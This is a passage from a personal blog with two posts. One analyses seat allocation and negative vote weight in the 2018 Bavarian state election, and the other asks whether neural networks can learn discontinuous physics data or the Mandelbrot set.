Because this is what happens in the next step: Remember that we already allocated a number of seats to constituency winners in the first round. Those count towards the number of seats that each party is supposed to get in step two according to the fraction of votes. Now, it can happen, that a party has won more direct candidates than seats allocated in step two. If that happens, more seats are added to the total number of seats and distributed according to the rules of step two until each party has been allocated at least the number of seats as direct candidates. This happens in particular if one party is stronger than all the other ones leading to that party winning almost all direct candidates (as in Bavaria this happened to the CSU which won all direct candidates except five in Munich and one in Würzburg which were won by the Greens).

A final complication is that Bavaria is split into seven electoral districts and the above procedure is for each district separately. So there are seven times rounding and adding seats procedures.

Sunday's election resulted in the following distribution of seats:

After the whole procedure, there are 205 seats distributed as follows

CSU 85 (41.5% of seats)
SPD 22 (10.7% of seats)
FW 27 (13.2% of seats)
GREENS 38 (18.5% of seats)
FDP 11 (5.4% of seats)
AFD 22 (10.7% of seats)

You can find all the total of votes on this page.

Now, for example one can calculate the distribution without districts throwing just everything in a single super-district. Then there are 208 seats distributed as

CSU 85 (40.8%)
SPD 22 (10.6%)
FW 26 (12.5%)
GREENS 40 (19.2%)
FDP 12 (5.8%)
AFD 23 (11.1%)

You can see that in particular the CSU, the party with the biggest number of votes profits from doing the rounding 7 times rather than just once and the last three parties would benefit from giving up districts.

But then there is actually an issue of negative weight of votes: The greens are particularly strong in Munich where they managed to win 5 direct seats. If instead those seats would have gone to the CSU (as elsewhere), the number of seats for Oberbayern, the district Munich belongs to would have had to be increased to accommodate those addition direct candidates for the CSU increasing the weight of Oberbayern compared to the other districts which would then be beneficial for the greens as they are particularly strong in Oberbayern: So if I give all the direct candidates to the CSU (without modifying the numbers of total votes), I get the follwing distribution:

221 seats

CSU 91 (41.2%)
SPD 24 (10.9%)
FW 28 (12,6%)
GREENS 42 (19.0%)
FDP 12 (5.4%)
AFD 24 (10.9%)

That is, there greens would have gotten a higher fraction of seats if they had won less constituencies. Voting for green candidates in Munich actually hurt the party as a whole!

The effect is not so big that it actually changes majorities (CSU and FW are likely to form a coalition) but still, the constitutional court does not like (predictable) negative weight of votes. Let's see if somebody challenges this election and what that would lead to.

The perl script I used to do this analysis is here.

Postscript:
The above analysis in the last point is not entirely fair as not to win a constituency means getting fewer votes which then are missing from the grand total. Taking this into account makes the effect smaller. In fact, subtracting the votes from the greens that they were leading by in the constituencies they won leads to an almost zero effect:

Seats: 220

CSU 91 41.4%
SPD 24 10.9%
FW 28 12.7%
GREENS 41 18.6%
FDP 12 5.4%
AFD 24 10.9%

Letting the greens win München Mitte (a newly created constituency that was supposed to act like a bad bank for the CSU taking up all central Munich more left leaning voters, do I hear somebody say "Gerrymandering"?) yields

Seats: 217

CSU 90 41.5%
SPD 23 10.6%
FW 28 12.9%
GREENS 41 18.9%
FDP 12 5.5%
AFD 23 10.6%

Or letting them win all but Moosach and Würzbug-Stadt where the lead was the smallest:

Seats: 210

CSU 87 41.4%
SPD 22 10.5%
FW 27 12.9%
GREENS 40 19.0%
FDP 11 5.2%
AFD 23 11.0%

Machine Learning for Physics?!?

2018-03-29T21:35:00.000+02:00

Today was the last day of a nice workshop here at the Arnold Sommerfeld Center organised by Thomas Grimm and Sven Krippendorf on the use of Big Data and Machine Learning in string theory. While the former (at this workshop mainly in the form of developments following Kreuzer/Skarke and taking it further for F-theory constructions, orbifolds and the like) appears to be quite advanced as of today, the latter is still in its very early days. At best.

I got the impression that for many physicists that have not yet spent too much time with this, deep learning and in particular deep neural networks are expected to be some kind of silver bullet that can answer all kinds of questions that humans have not been able to answer despite some effort. I think this hope is at best premature and looking at the (admittedly impressive) examples where it works (playing Go, classifying images, speech recognition, event filtering at LHC) these seem to be more like those problems where humans have at least a rough idea how to solve them (if it is not something that humans do everyday like understanding text) and also roughly how one would code it but that are too messy or vague to be treated by a traditional program.

So, during some of the less entertaining talks I sat down and thought about problems where I would expect neural networks to perform badly. And then, if this approach fails even in simpler cases that are fully under control one should maybe curb the expectations for the more complex cases that one would love to have the answer for. In the case of the workshop that would be guessing some topological (discrete) data (that depends very discontinuously on the model parameters). Here a simple problem would be a 2-torus wrapped by two 1-branes. And the computer is supposed to compute the number of matter generations arising from open strings at the intersections, i.e. given two branes (in terms of their slope w.r.t. the cycles of the torus) how often do they intersect? Of course these numbers depend sensitively on the slope (as a real number) as for rational slopes [latex]p/q[/latex] and [latex]m/n[/latex] the intersection number is the absolute value of [latex]pn-qm[/latex]. My guess would be that this is almost impossible to get right for a neural network, let alone the much more complicated variants of this simple problem.

Related but with the possibility for nicer pictures is the following: Can a neural network learn the shape of the Mandelbrot set? Let me remind those of you who cannot remember the 80ies anymore, for a complex number c you recursively apply the function
[latex]f_c(z)= z^2 +c[/latex]
starting from 0 and ask if this stays bounded (a quick check shows that once you are outside [latex]|z| < 2[/latex] you cannot avoid running to infinity). You color the point c in the complex plane according to the number of times you have to apply f_c to 0 to leave this circle. I decided to do this for complex numbers x+iy in the rectangle -0.74

I have written a small mathematica program to compute this image. Built into mathematica is also a neural network: You can feed training data to the function Predict[], for me these were 1,000,000 points in this rectangle and the number of steps it takes to leave the 2-ball. Then mathematica thinks for about 24 hours and spits out a predictor function. Then you can plot this as well:

There is some similarity but clearly it has no idea about the fractal nature of the Mandelbrot set. If you really believe in magic powers of neural networks, you might even hope that once it learned the function for this rectangle one could extrapolate to outside this rectangle. Well, at least in this case, this hope is not justified: The neural network thinks the correct continuation looks like this:

Ehm. No.

All this of course with the caveat that I am no expert on neural networks and I did not attempt anything to tune the result. I only took the neural network function built into mathematica. Maybe, with a bit of coding and TensorFlow one can do much better. But on the other hand, this is a simple two dimensional problem. At least for traditional approaches this should be much simpler than the other much higher dimensional problems the physicists are really interested in.